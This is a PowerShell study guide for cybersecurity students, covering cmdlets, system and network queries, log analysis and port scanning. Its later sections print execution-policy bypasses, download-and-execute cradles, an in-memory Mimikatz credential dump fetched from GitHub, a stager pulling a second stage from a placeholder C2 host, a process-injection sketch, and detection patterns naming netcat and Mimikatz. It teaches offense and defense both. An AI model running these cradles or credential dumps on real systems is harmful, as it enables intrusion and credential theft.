PowerShell Bible
Study Materials for Cybersecurity Students
Table of Contents
1. Introduction to PowerShell
PowerShell is a powerful command-line shell and scripting language built on the .NET framework. Unlike traditional command-line interfaces that work with text, PowerShell works with objects, making it incredibly powerful for system administration and cybersecurity tasks.
Why PowerShell Matters in Cybersecurity
System Administration: Manage Windows systems, users, and services
Incident Response: Quickly gather system information and analyze threats
Penetration Testing: Perform reconnaissance and exploitation tasks
Automation: Automate repetitive security tasks and monitoring
Forensics: Collect and analyze digital evidence
Key Features
Object-oriented: Works with .NET objects, not just text
Cross-platform: Available on Windows, Linux, and macOS
Extensible: Thousands of built-in commands (cmdlets)
Integrated: Deep integration with Windows and .NET ecosystem
2. Getting Started
Installation and Access
Windows:
PowerShell 5.1 comes pre-installed on Windows 10/11
PowerShell 7+ can be installed via:
winget install Microsoft.PowerShell
Linux/macOS:
# Linux
curl -sSL https://aka.ms/install-powershell.sh | bash
# macOS
brew install --cask powershellLaunching PowerShell
Windows PowerShell:
powershell.exePowerShell Core/7+:
pwsh.exeAs Administrator: Right-click → "Run as Administrator"
Basic Interface
PS C:\Users\Student> # This is the PowerShell prompt
# PS = PowerShell
# C:\Users\Student = Current directory
# > = Ready for input3. Essential PowerShell Fundamentals
Understanding Cmdlets
PowerShell commands are called "cmdlets" and follow a Verb-Noun pattern:
Get-Process # Get information about processes
Stop-Service # Stop a Windows service
Set-Location # Change directoryCommon Verbs
Get: Retrieve information
Set: Modify settings
Start/Stop: Control services/processes
New: Create new objects
Remove: Delete objects
Test: Verify conditions
Getting Help
The help system is your best friend:
Get-Help Get-Process # Basic help
Get-Help Get-Process -Examples # Show examples
Get-Help Get-Process -Detailed # Detailed help
Get-Help Get-Process -Full # Complete help
Get-Help *process* # Find commands with "process"Discovering Commands
Get-Command # List all commands
Get-Command *service* # Find service-related commands
Get-Command -Verb Get # All commands that "get" things
Get-Command -Noun Process # All process-related commands4. Core Commands for Cybersecurity
System Information Commands
Get-ComputerInfo - Comprehensive system information
Get-ComputerInfo | Select-Object WindowsProductName, TotalPhysicalMemory, CsProcessorsGet-WmiObject - Windows Management Instrumentation queries
Get-WmiObject -Class Win32_OperatingSystem
Get-WmiObject -Class Win32_LogicalDiskGet-CimInstance - Modern replacement for Get-WmiObject
Get-CimInstance -ClassName Win32_Process
Get-CimInstance -ClassName Win32_ServiceProcess and Service Management
Get-Process - List running processes
Get-Process # All processes
Get-Process -Name "chrome" # Specific process
Get-Process | Where-Object {$_.CPU -gt 100} # High CPU processesGet-Service - Manage Windows services
Get-Service # All services
Get-Service -Name "win*" # Services starting with "win"
Get-Service | Where-Object {$_.Status -eq "Running"}Network Commands
Test-NetConnection - Network connectivity testing
Test-NetConnection google.com # Basic connectivity
Test-NetConnection google.com -Port 443 # Test specific portGet-NetTCPConnection - Active network connections
Get-NetTCPConnection -State Established # Active connections
Get-NetTCPConnection -LocalPort 80 # Connections on port 80Resolve-DnsName - DNS resolution
Resolve-DnsName google.com # Resolve domain
Resolve-DnsName 8.8.8.8 # Reverse DNS lookup5. Variables and Data Types
Basic Variables
Variables in PowerShell start with $:
$name = "Student"
$age = 25
$isAdmin = $true
$servers = @("web01", "db01", "mail01")Automatic Variables
PowerShell provides many built-in variables:
$env:USERNAME # Current username
$env:COMPUTERNAME # Computer name
$env:PATH # System PATH
$PWD # Current directory
$? # Last command success status
$Error # Array of recent errorsEnvironment Variables
Access system environment variables:
$env:TEMP # Temporary directory
$env:USERPROFILE # User profile directory
$env:PROGRAMFILES # Program Files directory
# List all environment variables
Get-ChildItem Env:Arrays and Hash Tables
# Arrays
$ports = @(80, 443, 22, 3389)
$ports[0] # First element (80)
$ports[-1] # Last element (3389)
# Hash tables (key-value pairs)
$serverInfo = @{
Name = "WebServer01"
IP = "192.168.1.100"
OS = "Windows Server 2019"
}
$serverInfo.Name # Access by key
$serverInfo["IP"] # Alternative syntax6. Working with Objects and Pipelines
The Pipeline
PowerShell's pipeline (|) passes objects between commands:
Get-Process | Where-Object {$_.CPU -gt 50} | Sort-Object CPU -DescendingThis command:
Gets all processes
Filters for high CPU usage
Sorts by CPU usage (highest first)
Object Properties and Methods
Explore object structure with Get-Member:
Get-Process | Get-Member # Show available properties/methods
Get-Service | Get-Member -MemberType Property # Only propertiesSelecting and Filtering
Select-Object - Choose specific properties
Get-Process | Select-Object Name, CPU, WorkingSet
Get-Process | Select-Object -First 5 # First 5 processesWhere-Object - Filter objects
Get-Service | Where-Object {$_.Status -eq "Running"}
Get-Process | Where-Object {$_.ProcessName -like "*chrome*"}Sort-Object - Sort results
Get-Process | Sort-Object CPU -Descending
Get-Service | Sort-Object Name7. Security Policies and Bypasses
Understanding Execution Policy
PowerShell's execution policy controls script execution:
Restricted: No scripts allowed (default on Windows desktop)
RemoteSigned: Local scripts OK, remote scripts must be signed
AllSigned: All scripts must be signed
Unrestricted: All scripts allowed (default on Linux/macOS)
Bypass: No restrictions or warnings
Checking Current Policy
Get-ExecutionPolicy # Current policy
Get-ExecutionPolicy -List # All scopesBypassing Execution Policy
⚠️ Important: These techniques are for educational and legitimate testing purposes only.
Method 1: Temporary bypass for current session
Set-ExecutionPolicy -Scope Process -ExecutionPolicy BypassMethod 2: Command-line bypass
powershell.exe -ExecutionPolicy Bypass -File script.ps1Method 3: Download and execute
IEX (New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')
# Or shorter:
iex (iwr http://example.com/script.ps1 -UseBasicParsing).ContentMethod 4: Encode and execute
$command = "Get-Process"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommandZone Identifier and Unblocking Files
Windows marks downloaded files as potentially unsafe:
# Check if file is blocked
Get-Item script.ps1 -Stream *
Get-Content script.ps1 -Stream Zone.Identifier
# Unblock file
Unblock-File script.ps1
# Unblock all files in directory
Get-ChildItem -Recurse | Unblock-File8. File System Operations
Navigation and Listing
Get-Location # Current directory (pwd)
Set-Location C:\Windows # Change directory (cd)
Get-ChildItem # List files (ls/dir)
Get-ChildItem -Recurse # Recursive listing
Get-ChildItem -Hidden # Show hidden files
Get-ChildItem -Force # Show all files including systemFile Operations
# Create files and directories
New-Item -ItemType File -Name "test.txt"
New-Item -ItemType Directory -Name "TestFolder"
# Copy, move, remove
Copy-Item source.txt destination.txt
Move-Item oldname.txt newname.txt
Remove-Item unwanted.txt
# Read file content
Get-Content file.txt
Get-Content file.txt -Tail 10 # Last 10 lines
Get-Content file.txt | Select-String "error" # Search for textFile Properties and Permissions
# File properties
Get-ItemProperty file.txt
Get-ChildItem | Select-Object Name, Length, LastWriteTime
# File permissions (Windows)
Get-Acl file.txt
Get-Acl C:\Windows | Format-List
# Find files by criteria
Get-ChildItem -Recurse -Name "*.log"
Get-ChildItem -Recurse | Where-Object {$_.Length -gt 1MB}Alternate Data Streams (Windows)
# List all streams
Get-Item file.txt -Stream *
# Create hidden data stream
Set-Content -Path file.txt -Stream "Hidden" -Value "Secret data"
# Read from stream
Get-Content -Path file.txt -Stream "Hidden"9. Network and System Information
Network Configuration
# Network adapters
Get-NetAdapter
Get-NetIPConfiguration
# IP addresses
Get-NetIPAddress
Get-NetIPAddress -AddressFamily IPv4
# Routing table
Get-NetRouteNetwork Connectivity
# Ping equivalent
Test-Connection google.com
Test-Connection -ComputerName google.com -Count 2
# Port testing
Test-NetConnection google.com -Port 443
Test-NetConnection -ComputerName 192.168.1.1 -Port 22
# DNS queries
Resolve-DnsName google.com
Resolve-DnsName google.com -Type MX # Mail serversSystem Monitoring
# Event logs
Get-EventLog -LogName System -Newest 10
Get-WinEvent -LogName Security -MaxEvents 5
# Performance counters
Get-Counter "\Processor(_Total)\% Processor Time"
Get-Counter "\Memory\Available MBytes"
# Scheduled tasks
Get-ScheduledTask
Get-ScheduledTask | Where-Object {$_.State -eq "Running"}User and Group Information
# Local users
Get-LocalUser
Get-LocalUser -Name "Administrator"
# Local groups
Get-LocalGroup
Get-LocalGroupMember -Group "Administrators"
# Current user context
whoami
[System.Security.Principal.WindowsIdentity]::GetCurrent()10. Practical Cybersecurity Examples
Example 1: System Reconnaissance
# Gather basic system information
$info = @{
ComputerName = $env:COMPUTERNAME
Username = $env:USERNAME
OS = (Get-CimInstance Win32_OperatingSystem).Caption
Architecture = (Get-CimInstance Win32_OperatingSystem).OSArchitecture
Domain = (Get-CimInstance Win32_ComputerSystem).Domain
LastBoot = (Get-CimInstance Win32_OperatingSystem).LastBootUpTime
}
$info | ConvertTo-JsonExample 2: Network Port Scanning
# Simple port scanner
function Test-Port {
param($ComputerName, $Port)
$timeout = 1000
$tcp = New-Object System.Net.Sockets.TcpClient
$connect = $tcp.BeginConnect($ComputerName, $Port, $null, $null)
$wait = $connect.AsyncWaitHandle.WaitOne($timeout, $false)
if ($wait) {
try {
$tcp.EndConnect($connect)
$tcp.Close()
return $true
} catch {
return $false
}
} else {
return $false
}
}
# Scan common ports
$commonPorts = @(21, 22, 23, 25, 53, 80, 110, 143, 443, 993, 995, 3389)
foreach ($port in $commonPorts) {
if (Test-Port -ComputerName "192.168.1.1" -Port $port) {
Write-Host "Port $port is open" -ForegroundColor Green
}
}Example 3: Log Analysis
# Analyze failed login attempts
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625} -MaxEvents 50 |
ForEach-Object {
$xml = [xml]$_.ToXml()
[PSCustomObject]@{
Time = $_.TimeCreated
Account = $xml.Event.EventData.Data[5].'#text'
SourceIP = $xml.Event.EventData.Data[19].'#text'
Reason = $xml.Event.EventData.Data[8].'#text'
}
} | Group-Object Account | Sort-Object Count -DescendingExample 4: Process Monitoring
# Monitor for suspicious processes
$suspiciousProcesses = @("nc.exe", "ncat.exe", "netcat.exe", "mimikatz.exe")
while ($true) {
$runningProcesses = Get-Process | Select-Object -ExpandProperty ProcessName
foreach ($suspicious in $suspiciousProcesses) {
if ($runningProcesses -contains $suspicious.Replace(".exe", "")) {
Write-Warning "Suspicious process detected: $suspicious"
# Log or take action here
}
}
Start-Sleep -Seconds 10
}11. Fileless Execution & In-Memory Operations
Fileless execution and in-memory operations are critical techniques in modern cybersecurity, used by both attackers and security professionals. These methods allow code execution without writing files to disk, making detection more challenging and leaving minimal forensic traces.
Understanding Fileless Execution
Fileless execution refers to running code directly in memory without creating files on the target system's hard drive. This technique:
Evades file-based detection: Traditional antivirus solutions scan files on disk
Reduces forensic footprint: No persistent artifacts left behind
Leverages legitimate tools: Uses built-in system utilities like PowerShell
Enables living-off-the-land: Utilizes existing system capabilities
Core Concepts
Memory-based execution works by:
Downloading code/binaries directly into system memory
Loading and executing the code from memory
Avoiding disk writes that could trigger security alerts
Using reflection and .NET capabilities for execution
PowerShell Commands for Memory Operations
Invoke-WebRequest (iwr)
Downloads content directly into memory:
# Basic web request - stores response in memory
$response = Invoke-WebRequest -Uri "https://example.com/script.ps1"
$content = $response.Content
# Download and execute in one line
IEX (Invoke-WebRequest -Uri "https://example.com/script.ps1" -UseBasicParsing).Content
# With error handling
try {
$script = (Invoke-WebRequest -Uri "https://example.com/payload.ps1" -UseBasicParsing).Content
Invoke-Expression $script
} catch {
Write-Error "Download failed: $_"
}Invoke-RestMethod (irm)
Simplified method for REST API calls:
# Download and execute PowerShell script
Invoke-RestMethod -Uri "https://example.com/script.ps1" | Invoke-Expression
# Download binary data
$binaryData = Invoke-RestMethod -Uri "https://example.com/payload.exe".NET WebClient Class
Lower-level approach using .NET directly:
# Create WebClient object
$webClient = New-Object System.Net.WebClient
# Download string content
$script = $webClient.DownloadString("https://example.com/script.ps1")
Invoke-Expression $script
# Download binary data
$binaryData = $webClient.DownloadData("https://example.com/payload.exe")
# Clean up
$webClient.Dispose()In-Memory Binary Execution Techniques
Reflection-Based Loading
Using .NET reflection to load assemblies in memory:
# Load assembly from byte array
$assemblyBytes = [System.Convert]::FromBase64String($base64Assembly)
$assembly = [System.Reflection.Assembly]::Load($assemblyBytes)
# Get entry point and invoke
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, @())PowerShell Runspaces
Creating isolated execution environments:
# Create runspace
$runspace = [runspacefactory]::CreateRunspace()
$runspace.Open()
# Create PowerShell instance
$powershell = [powershell]::Create()
$powershell.Runspace = $runspace
# Add script and execute
$powershell.AddScript($downloadedScript)
$result = $powershell.Invoke()
# Clean up
$powershell.Dispose()
$runspace.Close()Practical Examples
Example 1: Mimikatz in Memory
Educational Purpose: Understanding credential extraction techniques
# WARNING: This is for educational/authorized testing only
# Download Mimikatz PowerShell version (Invoke-Mimikatz)
$mimikatzUrl = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"
# Method 1: Direct execution
IEX (New-Object Net.WebClient).DownloadString($mimikatzUrl)
Invoke-Mimikatz -Command "sekurlsa::logonpasswords"
# Method 2: With variable storage
$mimikatz = (New-Object Net.WebClient).DownloadString($mimikatzUrl)
Invoke-Expression $mimikatz
Invoke-Mimikatz -DumpCredsExample 2: PowerShell Empire Style
Red Team Technique: Stager-based execution
# Empire-style stager (simplified example)
$stager = @"
`$wc = New-Object System.Net.WebClient;
`$wc.Headers.Add('User-Agent', 'Mozilla/5.0');
`$data = `$wc.DownloadData('https://c2server.com/stage2');
`$assembly = [System.Reflection.Assembly]::Load(`$data);
`$assembly.EntryPoint.Invoke(`$null, @());
"@
# Execute stager
Invoke-Expression $stagerExample 3: Cobalt Strike Beacon Style
Advanced Persistent Threat Simulation:
# Beacon-style payload loader
function Load-Beacon {
param([string]$Url, [string]$Key)
# Download encrypted payload
$encryptedData = (New-Object Net.WebClient).DownloadData($Url)
# Decrypt payload (simplified)
$decryptedData = Decrypt-Data $encryptedData $Key
# Load and execute
$assembly = [Reflection.Assembly]::Load($decryptedData)
$assembly.EntryPoint.Invoke($null, @())
}Example 4: Script Block Execution
Dynamic Code Execution:
# Download and execute script block
$scriptBlock = [ScriptBlock]::Create((iwr "https://example.com/payload.ps1").Content)
& $scriptBlock
# With parameters
$scriptBlock = [ScriptBlock]::Create($downloadedScript)
& $scriptBlock -Parameter1 "value1" -Parameter2 "value2"Advanced Techniques
Process Injection
Injecting code into existing processes:
# Get target process
$targetProcess = Get-Process -Name "notepad"
# Allocate memory in target process
$memoryAddress = [Win32API]::VirtualAllocEx($targetProcess.Handle, 0, $payloadSize, 0x3000, 0x40)
# Write payload to allocated memory
[Win32API]::WriteProcessMemory($targetProcess.Handle, $memoryAddress, $payload, $payloadSize, 0)
# Create remote thread to execute payload
[Win32API]::CreateRemoteThread($targetProcess.Handle, 0, 0, $memoryAddress, 0, 0, 0)DLL Reflection
Loading DLLs without file system interaction:
# Load DLL from memory
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class DLLLoader {
[DllImport("kernel32.dll")]
public static extern IntPtr LoadLibrary(string dllToLoad);
[DllImport("kernel32.dll")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
}
"@
# Use reflection to call DLL functions
$dllHandle = [DLLLoader]::LoadLibrary("advapi32.dll")
$procAddress = [DLLLoader]::GetProcAddress($dllHandle, "LogonUserA")Detection and Mitigation Strategies
Detection Methods
PowerShell Logging:
# Enable PowerShell script block logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
# Enable PowerShell transcription
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableTranscripting" -Value 1Behavioral Monitoring:
Monitor for suspicious network connections
Track unusual process relationships
Analyze memory usage patterns
Watch for encoded command execution
Command Line Analysis:
# Detect suspicious PowerShell usage
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} |
Where-Object {$_.Message -match "(DownloadString|Invoke-Expression|FromBase64String)"}Mitigation Strategies
PowerShell Security Features:
# Set restrictive execution policy
Set-ExecutionPolicy -ExecutionPolicy Restricted -Scope LocalMachine
# Enable Constrained Language Mode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
# Use Application Control (WDAC/AppLocker)
# Block unsigned PowerShell scriptsNetwork Security:
Implement DNS filtering
Monitor outbound connections
Use proxy servers with content inspection
Deploy network segmentation
Endpoint Protection:
Enable Windows Defender Application Guard
Use behavior-based detection tools
Implement endpoint detection and response (EDR)
Deploy application whitelisting
System Hardening:
# Disable PowerShell v2 (legacy version)
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
# Remove PowerShell ISE if not needed
Get-WindowsCapability -Online | Where-Object Name -like "*PowerShell.ISE*" | Remove-WindowsCapability -Online
# Configure Windows Event Forwarding for centralized logging
wecutil qc12. Common Pitfalls and Best Practices
Common Pitfalls
Not Understanding the Pipeline
Remember: PowerShell passes objects, not text
Use
Get-Memberto understand object structure
Ignoring Execution Policy
Always check execution policy in new environments
Understand the security implications of bypasses
Not Using Proper Error Handling
# Bad Get-Process -Name "nonexistent" # Good try { Get-Process -Name "nonexistent" -ErrorAction Stop } catch { Write-Warning "Process not found: $_" }Forgetting About Case Sensitivity
PowerShell is generally case-insensitive
But some operators have case-sensitive variants (
-ceq,-clike)
Best Practices
Use Full Cmdlet Names in Scripts
# Good for scripts Get-ChildItem | Where-Object {$_.Length -gt 1MB} # OK for interactive use gci | ? {$_.Length -gt 1MB}Always Test with
-WhatIfRemove-Item *.log -WhatIf # See what would be deletedUse Proper Parameter Names
# Good Get-Process -Name "chrome" # Avoid Get-Process chromeHandle Errors Appropriately
Get-Service -Name "NonExistent" -ErrorAction SilentlyContinueUse Comments and Documentation
# Get all running services related to Windows Update Get-Service -Name "*update*" | Where-Object {$_.Status -eq "Running"}
13. Quick Reference
Essential Cmdlets
Get-Help
Get help for commands
Get-Help Get-Process
Get-Command
Find commands
Get-Command *service*
Get-Member
Explore objects
Get-Process | Get-Member
Get-Process
List processes
Get-Process -Name chrome
Get-Service
List services
Get-Service -Name win*
Get-ChildItem
List files/folders
Get-ChildItem -Recurse
Test-Connection
Ping hosts
Test-Connection google.com
Invoke-WebRequest
Web requests
Invoke-WebRequest http://example.com
Common Aliases
ls, dir, gci
Get-ChildItem
List files
cd, sl
Set-Location
Change directory
pwd, gl
Get-Location
Show current directory
cat, gc, type
Get-Content
Read file content
ps, gps
Get-Process
List processes
gsv
Get-Service
List services
iwr
Invoke-WebRequest
Web request
iex
Invoke-Expression
Execute string as command
Operators
-eq
Equal
$a -eq $b
-ne
Not equal
$a -ne $b
-gt
Greater than
$a -gt 5
-lt
Less than
$a -lt 10
-like
Wildcard match
$name -like "*admin*"
-match
Regex match
$text -match "\d+"
-contains
Array contains
$array -contains "value"
-and
Logical AND
($a -gt 5) -and ($b -lt 10)
-or
Logical OR
($a -eq 1) -or ($b -eq 2)
14. Glossary
Cmdlet: A PowerShell command that follows the Verb-Noun naming convention.
Pipeline: The mechanism that passes objects from one command to another using the | operator.
Object: A data structure that contains both data (properties) and functions (methods).
Parameter: An input to a cmdlet that modifies its behavior.
Alias: A shorter name for a cmdlet (e.g., ls for Get-ChildItem).
Execution Policy: A security feature that controls which PowerShell scripts can run.
Provider: A PowerShell component that provides access to data stores (file system, registry, etc.).
Module: A package of PowerShell functionality that can be imported and used.
Script Block: A collection of PowerShell statements enclosed in braces {}.
WMI/CIM: Windows Management Instrumentation - a framework for managing Windows systems.
Splatting: A technique for passing parameters to cmdlets using hash tables.
Alternate Data Stream: A feature of NTFS that allows multiple data streams per file.
15. Additional Resources
Official Documentation: https://docs.microsoft.com/powershell/
PowerShell Gallery: https://www.powershellgallery.com/
Community Forums: https://reddit.com/r/PowerShell
Security Focus: https://github.com/PowerShellMafia/PowerSploit
Remember: With great power comes great responsibility. Use PowerShell ethically and in accordance with your organization's policies and applicable laws.
PowerShell Bible for Cybersecurity Students - Version 1.0 Created for educational purposes by TryHard3r
Last updated